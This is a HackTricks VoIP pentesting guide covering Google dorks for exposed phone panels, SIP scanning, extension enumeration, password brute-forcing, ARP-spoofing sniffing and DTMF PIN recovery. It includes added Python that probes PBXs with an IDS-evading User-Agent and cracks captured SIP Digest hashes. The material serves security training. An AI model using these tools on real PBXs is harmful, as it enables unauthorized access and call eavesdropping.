hacktricks/network-services-pentesting/pentesting-voip/README.md
# Pentesting VoIP
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## VoIP Basic Information
To start learning about how VoIP works check:
{% content-ref url="basic-voip-protocols/" %}
[basic-voip-protocols](basic-voip-protocols/)
{% endcontent-ref %}
## VoIP Red Team Methodology
## VoIP Enumeration
### Telephone Numbers
One of the first steps a Red Team can take is to search for the phone numbers the company publishes to be contacted on, using OSINT tools, Google searches or scraping its web pages.
Once you have the telephone numbers you can use online services to identify the operator:
* [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis\&sub=phonenr)
* [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/)
* [https://www.whitepages.com/](https://www.whitepages.com/)
* [https://www.twilio.com/lookup](https://www.twilio.com/lookup)
Knowing whether the operator provides VoIP services tells you if the company is likely using VoIP. Moreover, it's possible that the company hasn't hired VoIP services but is using PSTN cards to connect its own VoIP PBX to the traditional telephony network.
Things such as automated responses (IVR menus) or hold music usually indicate that VoIP is being used.
### Google Dorks
```bash
# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org
# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"
# Cisco phones
inurl:"NetworkConfiguration" cisco
# Linksys phones
intitle:"Sipura SPA Configuration"
# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm
# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com
# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"
# FreePBX
inurl:"maint/index.php?FreePBX" intitle:"FreePBX" intext:"FreePBX Administration"
```
### OSINT information
Any other OSINT enumeration that helps to identify VoIP software being used will be helpful for a Red Team.
### Network Enumeration
* **`nmap`** can scan UDP services, but because of the number of UDP ports involved it's very slow and might not be very accurate with this kind of service.
* **`svmap`** from SIPVicious (`sudo apt install sipvicious`): locates SIP services in the indicated network.
* `svmap` is **easy to block** because it uses the User-Agent `friendly-scanner`, but you can modify the code in `/usr/share/sipvicious/sipvicious` and change it.
```bash
# Use --fp to fingerprint the services
svmap 192.168.1.0/24 -p 5060-5070 [--fp]
```
* **`sipscan.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It is multithreaded and can scan large network ranges. It lets you specify a port range, scan both TCP and UDP, use another method (OPTIONS by default) and set a custom User-Agent (and more).
```bash
./sipscan.py -i 192.168.2.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
[!] IP/Network: 192.168.2.0/24
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200
```
* **metasploit**:
```
auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP)
```
#### Extra Network Enumeration
The PBX could also be exposing other network services such as:
* **69/UDP (TFTP)**: Firmware updates
* **80 (HTTP) / 443 (HTTPS)**: To manage the device from the web
* **389 (LDAP)**: Alternative to store the users information
* **3306 (MySQL)**: MySQL database
* **5038 (AMI)**: Asterisk Manager Interface, allows controlling Asterisk from other platforms
* **5222 (XMPP)**: Messages using Jabber
* **5432 (PostgreSQL)**: PostgreSQL database
* And others...
### Extension Enumeration
Extensions in a PBX (Private Branch Exchange) system refer to the **unique internal identifiers assigned to individual** phone lines, devices, or users within an organization or business. Extensions make it possible to **route calls within the organization efficiently**, without the need for individual external phone numbers for each user or device.
* **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by **guessing a range of extensions or a given list of extensions**.
```bash
svwar 192.168.1.15 -p5060 -e100-300 -m REGISTER
```
* **`sipexten.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipexten identifies extensions on a SIP server. It can check large network and port ranges.
```bash
python3 sipexten.py -i 192.168.2.203 -r 5080 -e 100-200
```
* **metasploit**: You can also enumerate extensions/usernames with metasploit:
```
auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP)
auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP)
```
* **`enumiax`** (`apt install enumiax`): **enumIAX** is an Inter Asterisk Exchange (IAX) protocol **username brute-force enumerator**. It may operate in two distinct modes: sequential username guessing or dictionary attack.
```bash
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1 # Dictionary mode
enumiax -v -m3 -M3 192.168.1.1 # Sequential mode: every username of length 3 (-m min, -M max length)
```
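The OPTIONS and REGISTER probes that `svmap`/`sipscan.py` and `svwar`/`sipexten.py` send, written out by hand so the status codes they key on are visible. This is an added example, not HackTricks or SIPVicious code; the phone-like User-Agent, the local IP `192.168.1.50`, the `Asterisk PBX 18.9.0` and 401/404 replies and the extension list are constructed, and `probe()` is the only part that touches the network.

```python
import random
import socket

# Added example (not HackTricks/SIPVicious code): hand-rolled SIP OPTIONS/REGISTER
# probes plus the response parsing that svmap/sipscan and svwar/sipexten automate.

def _tag(n=8):
    """Random hex token for the Via branch, From tag and Call-ID."""
    return "".join(random.choice("0123456789abcdef") for _ in range(n))

def build_request(method, host, port, user="100", local_ip="192.168.1.50",
                  local_port=5060, user_agent="Cisco-CP7960G/8.0", cseq=1):
    """Minimal SIP request: OPTIONS for service discovery, REGISTER for extension
    probing. The User-Agent mimics a phone instead of 'friendly-scanner', which is
    the string IDS signatures and fail2ban rules look for (assumed UA value)."""
    lines = [
        f"{method} sip:{host}:{port} SIP/2.0",
        f"Via: SIP/2.0/UDP {local_ip}:{local_port};branch=z9hG4bK{_tag()};rport",
        f"From: <sip:{user}@{host}>;tag={_tag()}",
        f"To: <sip:{user}@{host}>",
        f"Call-ID: {_tag(16)}@{local_ip}",
        f"CSeq: {cseq} {method}",
        f"Contact: <sip:{user}@{local_ip}:{local_port}>",
        "Max-Forwards: 70",
        f"User-Agent: {user_agent}",
        "Content-Length: 0",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"

def parse_response(raw):
    """Return (status_code, {lower-case header name: value}) for a SIP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("SIP/2.0"):
        raise ValueError("not a SIP response: " + status_line)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return int(parts[1]), headers

def fingerprint(headers):
    """The Server / User-Agent header is the cheap fingerprint (Asterisk, FreeSWITCH, Cisco...)."""
    return headers.get("server") or headers.get("user-agent") or "unknown"

def classify_register(code):
    """svwar-style verdict from the status of an unauthenticated REGISTER.
    Caveat: Asterisk with alwaysauthreject=yes answers 401 for every extension,
    so status-code enumeration stops working."""
    if code in (401, 407):
        return "exists (auth required)"
    if code == 200:
        return "exists (registered without auth!)"
    if code == 404:
        return "absent"
    if code == 403:
        return "forbidden"
    return f"unknown ({code})"

def probe(host, port, message, timeout=2.0):
    """Send one request over UDP and return the raw reply (the only network I/O here)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(message.encode(), (host, port))
        data, _ = s.recvfrom(65535)
    return data.decode(errors="replace")

def enumerate_extensions(replies):
    """Map extension -> verdict, given {extension: raw REGISTER reply}."""
    return {ext: classify_register(parse_response(raw)[0]) for ext, raw in replies.items()}

# Constructed replies standing in for what a PBX would send back.
SAMPLE_OPTIONS_REPLY = (
    "SIP/2.0 200 OK\r\n"
    "Via: SIP/2.0/UDP 192.168.1.50:5060;branch=z9hG4bKdeadbeef;received=192.168.1.50\r\n"
    "Server: Asterisk PBX 18.9.0\r\n"
    "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO\r\n"
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_REGISTER_REPLIES = {
    "100": 'SIP/2.0 401 Unauthorized\r\nWWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="1a2b3c4d"\r\nContent-Length: 0\r\n\r\n',
    "9999": "SIP/2.0 404 Not Found\r\nContent-Length: 0\r\n\r\n",
}

if __name__ == "__main__":
    import sys
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 5060
    print(fingerprint(parse_response(probe(host, port, build_request("OPTIONS", host, port)))[1]))
    for ext in range(100, 110):
        reply = probe(host, port, build_request("REGISTER", host, port, user=str(ext)))
        print(ext, classify_register(parse_response(reply)[0]))
```

Run it as `python3 sipprobe.py <pbx-ip> [port]` against a lab PBX. The verdicts come from the status code alone, so on an Asterisk with `alwaysauthreject=yes` every extension answers 401 and this classifier, like svwar, degrades to "everything exists".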
## VoIP Attacks
### Password Brute-Force
Having discovered the **PBX** and some **extensions/usernames**, a Red Team could try to **authenticate via the `REGISTER` method** to an extension using a dictionary of common passwords to brute force the authentication.
{% hint style="danger" %}
Note that a **username** is often the same as the extension number, but this varies depending on the PBX system, its configuration and the organization's conventions.
If the username is not the same as the extension, you will need to **figure out the username** before you can brute-force its password.
{% endhint %}
* **`svcrack`** from SIPVicious (`sudo apt install sipvicious`): SVCrack allows you to crack the password for a specific username/extension on a PBX.
```bash
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 # Dictionary attack against a known extension/username
svcrack -u100 -r1-9999 -z4 10.0.0.1 # Numeric passwords 1-9999, zero-padded to 4 digits (0001..9999)
```
* **`siprcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIP Remote Crack tries each password of a wordlist against the indicated extensions on a live PBX (the related `sipcrack.py` works offline on digests captured from the network, see the sniffing section).
{% code overflow="wrap" %}
```bash
python3 siprcrack.py -i 192.168.2.203 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
```
{% endcode %}
* **Metasploit**:
* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)
* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb)
### VoIP Sniffing
If you find VoIP equipment inside an **Open Wifi network**, you could **sniff all the information**. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform **MitM attacks such as** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) between the **PBX and the gateway** in order to sniff the information.
Among the network information, you could find **web credentials** to manage the equipment, user **extensions**, **usernames**, **IP** addresses, even **hashed passwords** and **RTP packets** that you could replay to **hear the conversation**, and more.
{% hint style="danger" %}
Note that if **TLS is used in the SIP communication** you won't be able to see the SIP communication in clear.\
The same happens if **SRTP** or **ZRTP** is used: **RTP packets won't be in clear text**.
{% endhint %}
#### SIP credentials
[Check this example to understand better a **SIP REGISTER communication**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) to learn how are **credentials being sent**.
* **`sipdump`** & **`sipcrack`,** part of **sipcrack** (`apt-get install sipcrack`): these tools **extract** the SIP **digest authentications** from a **pcap** and **brute-force** them.
```bash
sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt
```
* **`siptshark.py`, `sipdump.py`, `sipcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:**
* **SipTshark** extracts SIP protocol data from a PCAP file.
* **SipDump** extracts SIP Digest authentications from a PCAP file.
* **SIP Digest Crack** cracks the digest authentications extracted from the SIP protocol.
```bash
python3 siptshark.py -f captura3.pcap [-filter auth]
python3 sipdump.py -f captura3.pcap -o data.txt
python3 sipcrack.py -f data.txt -w wordlist/rockyou.txt
```
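What `sipcrack`/`sipcrack.py` do once `sipdump` has pulled a Digest challenge-response out of the pcap: recompute the MD5 digest for each candidate password and compare it with the captured `response`. This is an added example, not the tools' code. The two captured REGISTERs, their realms, nonces and the wordlist are constructed (their `response` values are generated inside the block with the same function from the passwords `Summer2023!` and `1234`), and the second one uses `qop=auth` to show the variant with `nc`/`cnonce` that some PBXs require.

```python
import hashlib
import re

# Added example (not HackTricks or sipcrack code): SIP Digest computation
# (MD5, RFC 2617 style as used by SIP) and the offline crack loop.

def _md5(s):
    return hashlib.md5(s.encode()).hexdigest()

def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """response = MD5(HA1:nonce:HA2), or the qop=auth form when the PBX asked for it."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:  # qop="auth": the client also mixes in the nonce count and its cnonce
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")

_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')

def parse_sip_auth(message):
    """Pull the method and the Digest parameters out of a captured SIP request.
    Returns None when the request carries no (Proxy-)Authorization header."""
    request_line, *headers = message.split("\r\n")
    method = request_line.split(" ", 1)[0]
    for line in headers:
        name, _, value = line.partition(":")
        if name.strip().lower() in ("authorization", "proxy-authorization"):
            value = value.strip()
            if not value.lower().startswith("digest "):
                continue
            params = {k: q if q else u for k, q, u in _PARAM_RE.findall(value[7:])}
            params["method"] = method
            return params
    return None

def crack_sip_digest(auth, wordlist):
    """Recompute the response for every candidate; the first match is the password."""
    for password in wordlist:
        guess = digest_response(auth["username"], auth["realm"], password,
                                auth["method"], auth["uri"], auth["nonce"],
                                auth.get("qop"), auth.get("nc"), auth.get("cnonce"))
        if guess == auth["response"].lower():
            return password
    return None

# Constructed captures (no real PBX involved). The response values are produced
# here with digest_response() from the passwords below so the crack loop has
# something to find; in practice they come from sipdump / sipdump.py output.
_SAMPLE_PASSWORDS = ("Summer2023!", "1234")

SAMPLE_REGISTER_NO_QOP = (
    "REGISTER sip:pbx.example.local SIP/2.0\r\n"
    "From: <sip:101@pbx.example.local>;tag=1c3f\r\n"
    "To: <sip:101@pbx.example.local>\r\n"
    'Authorization: Digest username="101", realm="asterisk", nonce="6a1f3c9e", '
    'uri="sip:pbx.example.local", algorithm=MD5, response="'
    + digest_response("101", "asterisk", _SAMPLE_PASSWORDS[0], "REGISTER",
                      "sip:pbx.example.local", "6a1f3c9e")
    + '"\r\n'
    "Content-Length: 0\r\n\r\n"
)

SAMPLE_REGISTER_QOP = (
    "REGISTER sip:sip.example.local SIP/2.0\r\n"
    'Proxy-Authorization: Digest username="bob", realm="sip.example.local", nonce="f00dbabe", '
    'uri="sip:sip.example.local", qop=auth, nc=00000001, cnonce="0a4f113b", response="'
    + digest_response("bob", "sip.example.local", _SAMPLE_PASSWORDS[1], "REGISTER",
                      "sip:sip.example.local", "f00dbabe", "auth", "00000001", "0a4f113b")
    + '", algorithm=MD5\r\n'
    "Content-Length: 0\r\n\r\n"
)

WORDLIST = ["password", "1234", "admin", "Summer2023!"]  # constructed stand-in for rockyou.txt

if __name__ == "__main__":
    for capture in (SAMPLE_REGISTER_NO_QOP, SAMPLE_REGISTER_QOP):
        auth = parse_sip_auth(capture)
        print(auth["username"], "->", crack_sip_digest(auth, WORDLIST))
```

The loop is one MD5 of HA1 plus one of the final string per candidate (HA2 is constant for the capture), which is why SIP Digest with a short numeric password falls in seconds; the `qop` branch matters because a cracker that ignores `nc`/`cnonce` silently never matches on PBXs that challenge with `qop="auth"`.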
#### DTMF codes
**Not only SIP credentials** can be found in the network traffic, it's also possible to find DTMF codes, which are used for example to access the **voicemail**.\
These codes can travel in **SIP INFO messages** (out-of-band), **in-band in the audio**, or as **RTP telephone-event packets** (RFC 4733, formerly RFC 2833). RTP events carry the digit in clear in each packet, so Wireshark's RTP event dissector shows it directly. If the codes are in-band, cut that part of the conversation out of the RTP stream, save it as a wav file and use multimon-ng to extract them:
```bash
multimon-ng -a DTMF -t wav pin.wav
```
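The decoding multimon-ng performs on that wav, as an added example in Python rather than the tool's code: in-band DTMF is two simultaneous tones per key, and a Goertzel filter per DTMF frequency over short frames recovers the keys without an FFT. The audio is synthesized inside the block (constructed input: 100 ms keys with 60 ms gaps at 8 kHz), so it runs offline; a real recording goes through the same `decode_dtmf()` once its samples are read into a list normalized to [-1, 1].

```python
import math

# Added example (not HackTricks or multimon-ng code): synthesize in-band DTMF
# digits and decode them with the Goertzel algorithm, which is what a DTMF
# demodulator such as multimon-ng does frame by frame.

LOW_FREQS = (697, 770, 852, 941)
HIGH_FREQS = (1209, 1336, 1477, 1633)
KEYS = ("123A", "456B", "789C", "*0#D")  # rows = low tones, columns = high tones
KEYPAD = {(lo, hi): KEYS[i][j] for i, lo in enumerate(LOW_FREQS) for j, hi in enumerate(HIGH_FREQS)}
TONES = {digit: pair for pair, digit in KEYPAD.items()}

def synth_dtmf(digits, rate=8000, tone_ms=100, gap_ms=60, amp=0.5):
    """Constructed audio: each key is the sum of its two tones followed by silence."""
    samples = []
    for d in digits:
        lo, hi = TONES[d]
        for i in range(rate * tone_ms // 1000):
            t = i / rate
            samples.append(amp * math.sin(2 * math.pi * lo * t) + amp * math.sin(2 * math.pi * hi * t))
        samples.extend([0.0] * (rate * gap_ms // 1000))
    return samples

def goertzel_power(frame, freq, rate):
    """Energy of one frame at a single target frequency (second-order IIR, no FFT)."""
    coeff = 2 * math.cos(2 * math.pi * freq / rate)
    s1 = s2 = 0.0
    for x in frame:
        s1, s2 = x + coeff * s1 - s2, s1
    return s1 * s1 + s2 * s2 - coeff * s1 * s2

def classify_frame(frame, rate, min_energy=0.02, dominance=0.6):
    """Digit heard in this frame, or None for silence / ambiguous audio."""
    if sum(x * x for x in frame) / len(frame) < min_energy:
        return None
    low = {f: goertzel_power(frame, f, rate) for f in LOW_FREQS}
    high = {f: goertzel_power(frame, f, rate) for f in HIGH_FREQS}
    lo, hi = max(low, key=low.get), max(high, key=high.get)
    # the winning tone of each group must clearly dominate its group, else reject the frame
    if low[lo] < dominance * sum(low.values()) or high[hi] < dominance * sum(high.values()):
        return None
    return KEYPAD[(lo, hi)]

def decode_dtmf(samples, rate=8000, frame_len=205, min_frames=2):
    """Walk the audio in fixed frames; a digit is emitted once it has been heard in
    min_frames consecutive frames, and again only after silence or another digit."""
    digits, current, run = [], None, 0
    for start in range(0, len(samples) - frame_len + 1, frame_len):
        sym = classify_frame(samples[start:start + frame_len], rate)
        if sym == current:
            run += 1
        else:
            current, run = sym, 1
        if sym is not None and run == min_frames:
            digits.append(sym)
    return "".join(digits)

def recover_pin(digits="4821#"):
    """Round trip on constructed audio: synthesize the key presses, then decode them."""
    return decode_dtmf(synth_dtmf(digits))

if __name__ == "__main__":
    print(recover_pin())
```

The 205-sample frame at 8 kHz is the classic choice because it puts the eight DTMF frequencies close to integer Goertzel bins; the `min_frames` debounce and the dominance check are what keep the edges of a key press (a frame that is half tone, half silence) from producing spurious or wrong digits.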